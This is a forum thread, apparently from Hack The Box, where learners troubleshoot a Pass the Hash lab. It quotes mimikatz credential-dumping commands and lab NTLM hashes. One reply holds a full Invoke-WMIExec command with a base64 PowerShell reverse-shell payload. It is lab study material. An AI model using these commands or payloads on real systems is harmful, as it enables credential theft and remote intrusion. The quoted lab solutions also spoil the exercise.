As many people have said, some tasks seem to be particularly difficult which can be very frustrating, although giving the opportunity to hone micro techniques (being what I keep in mind to provide motivation), this question has got the better of me for too long now.
I will provide a sequence of methods, commands and outcomes undertaken and can someone pleasee let me know where I’m going wrong here . I feel as though I’m completing everything correctly but still cant manage to catch a shell.
Firstly, Im using evil-winrm to change the restricted admin mode with the following commands:
Following this, I’m dumping NTLM hashes using mimikatz and with the following commands:
privilege::debug
sekurlsa::logonPasswords full
This gives me the NTLM hashes for 4 user accounts (I wont provide the hashes here to avoid spoilers):
MS01
julio
david
john
Next, I RDP using julios creds as per the question.
From which I try to initiate a pass the hash (PTH) using mimikatz and with MS01 creds (this is to enable the lister with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:
Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):
Note: all instances of cmd and ps are run as admin.
I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.
Thanks for taking the time to read and all help appreciated
Make sure to generate your own shell using https://www.revshells.com/ . I couldn’t get it to work with the shell provided in their notes, even though the IP and ports used were identical. I generated my own and came right up.
I had some issues to with this and these steps helped me:
removed the -domain flag.
kept the user as julio
added -verbose to troubleshoot
did an Import-Module .\Invoke-TheHash.psd1 in Powershell.
For the raw shell. I picked Powershell #3 on left hand list. In the shell drop down pick “powershell” and left the encoding drop box set to none. I also changed my port 9434. You want to use the IP of the attack windows host. Then I copied just the encoded block into the example shown into the section an updated the parameters/flags accordingly.
Can anyone explain to me in a logical manner what is the ask in the last question of PtH section:
Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Let’s go step by step, following the instructions:
Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console
I am logged in through xfreerdp to 10.129.131.149 with user “Administrator” and password “30B3783CE2ABF1AF70F77D0660CF3453”. My interpretation the instruction is the following:
From where you have gotten to in the listener try “hostname” remember you’re looking for DC01.
You can message me directly if you still need further instruction
It’s been a while since I completed this lab but I’m sure the issue I was having had something to do with the powershell script/syntax. In the lesson htb provides multiple examples of ps scripts with slightly different syntax which is easily overlooked. Try using the other examples. Hope this helps
Just got it right after 3 hours…
Be carefull to not leave blank spaces when filling the parameters for the payload on revshells.
First RDP to the box with the Admin user and its hash.
This is the sintax for mimikatz:
Import-Module .\Invoke-WMIExec.ps1 or Import-Module .\Invoke-TheHash.psd1
then start your listener and type (Replace the b64 with your generated payload):
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwAMgA4ADIAOAAyACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==” and then, open a cmd in the same target, write whoami;hostname
what the ■■■■ is going on in the HTB. I did the same thing and was getting the same result when i was using Evil-WinRM on my Kalil Linux. But after spending 4 and half hours I did the exact same thing in RDP and got the revese shell (actual one with command execution capability). This is the problem with HTB. Their services don’t run accurately on other machines even I have faced same problem on SSH.